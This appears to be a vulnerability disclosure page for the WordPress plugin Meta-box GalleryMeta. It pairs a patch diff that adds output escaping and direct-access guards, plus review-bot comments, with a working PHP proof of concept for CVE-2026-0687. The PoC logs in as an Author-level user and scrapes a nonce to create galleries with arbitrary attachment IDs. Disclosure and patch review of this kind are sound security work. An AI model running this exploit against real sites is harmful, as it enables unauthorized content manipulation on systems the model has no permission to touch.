-		'not_found_in_trash' => __( 'No Slider found in Trash.', 'mbgm' )
+		'name'               => _x( 'Sliders', 'post type general name', 'meta-box-gallerymeta' ),
+		'singular_name'      => _x( 'Slider', 'post type singular name', 'meta-box-gallerymeta' ),
+		'menu_name'          => _x( 'Slider', 'admin menu', 'meta-box-gallerymeta' ),
+		'name_admin_bar'     => _x( 'Slider', 'add new on admin bar', 'meta-box-gallerymeta' ),
+		'add_new'            => _x( 'Add New', 'Slider', 'meta-box-gallerymeta' ),
+		'add_new_item'       => __( 'Add New Slider', 'meta-box-gallerymeta' ),
+		'new_item'           => __( 'New Slider', 'meta-box-gallerymeta' ),
+		'edit_item'          => __( 'Edit Slider', 'meta-box-gallerymeta' ),
+		'view_item'          => __( 'View Slider', 'meta-box-gallerymeta' ),
+		'all_items'          => __( 'All Sliders', 'meta-box-gallerymeta' ),
+		'search_items'       => __( 'Search Slider', 'meta-box-gallerymeta' ),
+		'parent_item_colon'  => __( 'Parent Slider:', 'meta-box-gallerymeta' ),
+		'not_found'          => __( 'No Slider found.', 'meta-box-gallerymeta' ),
+		'not_found_in_trash' => __( 'No Slider found in Trash.', 'meta-box-gallerymeta' )
 	);
 	$args = array(
 		'labels'             => $labels,
-        'description'        => __( 'Description.', 'mbgm' ),
+        'description'        => __( 'Description.', 'meta-box-gallerymeta' ),
 		'public'             => true,
 		'publicly_queryable' => true,
 		'show_ui'            => true,
--- a/meta-box-gallerymeta/include/sliders.php
+++ b/meta-box-gallerymeta/include/sliders.php
@@ -1,4 +1,7 @@
 <?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
 function mbgm_single_sliders_shortcode($atts) {
     ob_start();
     //set attributies
@@ -46,7 +49,7 @@
             <div class="carousel-indicators">
                 <?php $countb = 0;?>
                 <?php while($mbgm_single_blog->have_posts()) : $mbgm_single_blog->the_post(); ?>
-                    <button type="button" data-bs-target="#carouselExampleDark" data-bs-slide-to="<?php echo $countb;?>" class="<?php echo $countb == 0? 'active': '' ?>" aria-current="true" aria-label="<?php echo $countb;?>"></button>
+                    <button type="button" data-bs-target="#carouselExampleDark" data-bs-slide-to="<?php echo esc_attr($countb);?>" class="<?php echo esc_attr($countb == 0? 'active': ''); ?>" aria-current="true" aria-label="<?php echo esc_attr($countb);?>"></button>
                 <?php $countb++;?>
                 <?php endwhile;?>
             </div>
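Review bot: `data-bs-target="#carouselExampleDark"` is a fixed ID; if the slider shortcode is used twice on one page both carousels share it and the indicators drive the wrong one. Derive the ID from the post or a counter, as the gallery carousels do with `carousel_<?php echo esc_attr($post->ID);?>`. Also, `aria-label` receives the bare index, so assistive technology announces "0", "1", and so on; `sprintf( __( 'Slide %d', 'meta-box-gallerymeta' ), $countb + 1 )` reads better.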
--- a/meta-box-gallerymeta/templates/single-mb_gallery.php
+++ b/meta-box-gallerymeta/templates/single-mb_gallery.php
@@ -1,4 +1,8 @@
-<?php get_header();
+<?php
+if ( ! defined( 'ABSPATH' ) ) {
+    exit; // Exit if accessed directly
+}
+get_header();
 // Tranzkart_Wp_Elements::$template = 'archive';
 // get_template_part( 'template-parts/page', 'title' );
 while(have_posts())	: the_post();
@@ -20,17 +24,17 @@
 		<div class="col-sm-4 mb-2 text-center img_details_main">
 			<a class="gallery-demo img-fluid" href="<?php echo esc_url(wp_get_attachment_url( $image ));?>">
 				<div class="embed-responsive embed-responsive-16by9">
-					<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo $image_obj->mbgm_youtube_url;?>?rel=0" allowfullscreen></iframe>
+					<iframe class="embed-responsive-item" src="https://www.youtube.com/embed/<?php echo esc_attr($image_obj->mbgm_youtube_url);?>?rel=0" allowfullscreen></iframe>
 				</div>
 			</a>
-			<p class="img_details_title"><?php echo $image_obj->post_excerpt;?></p>
+			<p class="img_details_title"><?php echo esc_attr($image_obj->post_excerpt);?></p>
 		</div>
 		<?php  }else{ ?>
 		<div class="col-sm-4 mb-2 text-center img_details_main">
 			<a class="gallery-demo img-fluid" href="<?php echo esc_url(wp_get_attachment_url( $image ));?>">
-			<img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" alt="<?php echo $image_obj->post_excerpt;?>" class="img-thumbnail" />
+			<img src="<?php echo esc_url(wp_get_attachment_url( $image ));?>" alt="<?php echo esc_attr($image_obj->post_excerpt);?>" class="img-thumbnail" />
 			</a>
-			<p class="img_details_title"><?php echo $image_obj->post_excerpt;?></p>
+			<p class="img_details_title"><?php echo esc_attr($image_obj->post_excerpt);?></p>
 		</div>
 		<?php  }}} ?>
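Review bot: `esc_attr()` is applied to `$image_obj->post_excerpt` inside `<p class="img_details_title">` element content on both changed paragraph lines, where `esc_html()` is the matching function; the escaped character set is equivalent, so this is a consistency point. The iframe `src` here applies `esc_attr()` to `mbgm_youtube_url`, whereas the gallerymetaboxes.php hunks run `esc_url()` over the whole URL; neither restricts the value to a video ID, so validating it on save is the change that actually closes the gap, and the two templates should then use the same output function.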

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0687 - Meta-box GalleryMeta <= 3.0.1 - Missing Authorization to Authenticated (Author+) Gallery Management

<?php
/**
 * Proof of Concept for CVE-2026-0687
 * Requires valid WordPress authentication cookies for a user with Author role or higher
 */

$target_url = 'https://vulnerable-wordpress-site.com';
$username = 'attacker_author';
$password = 'password123';

// Step 1: Authenticate to obtain session cookies
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$response = curl_exec($ch);

// Step 2: Create new gallery post
$new_gallery_url = $target_url . '/wp-admin/post-new.php?post_type=mb_gallery';
curl_setopt($ch, CURLOPT_URL, $new_gallery_url);
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from the form (required for WordPress submission)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $nonce_matches);
$wp_nonce = $nonce_matches[1] ?? '';

// Step 3: Submit gallery with unauthorized image IDs
$submit_url = $target_url . '/wp-admin/post.php';
$gallery_data = array(
    'post_type' => 'mb_gallery',
    'post_title' => 'Unauthorized Gallery - Atomic Edge PoC',
    'post_status' => 'publish',
    '_wpnonce' => $wp_nonce,
    '_wp_http_referer' => '/wp-admin/post-new.php?post_type=mb_gallery',
    'mbgm_gallery_id' => array(
        '0' => '123',  // Arbitrary attachment ID
        '1' => '456'   // Another arbitrary attachment ID
    ),
    'action' => 'editpost',
    'post_ID' => '0'  // New post
);

curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($gallery_data));
$response = curl_exec($ch);

// Verify success by checking for gallery ID in response
if (strpos($response, 'mbgm_gallery_id') !== false) {
    echo "SUCCESS: Unauthorized gallery created.\n";
    // Extract the new post ID from redirect
    preg_match('/post=([0-9]+)&action=edit/', $response, $post_id_matches);
    if (!empty($post_id_matches[1])) {
        echo "Gallery ID: " . $post_id_matches[1] . "\n";
    }
} else {
    echo "FAILED: Gallery creation unsuccessful.\n";
}

curl_close($ch);
?>
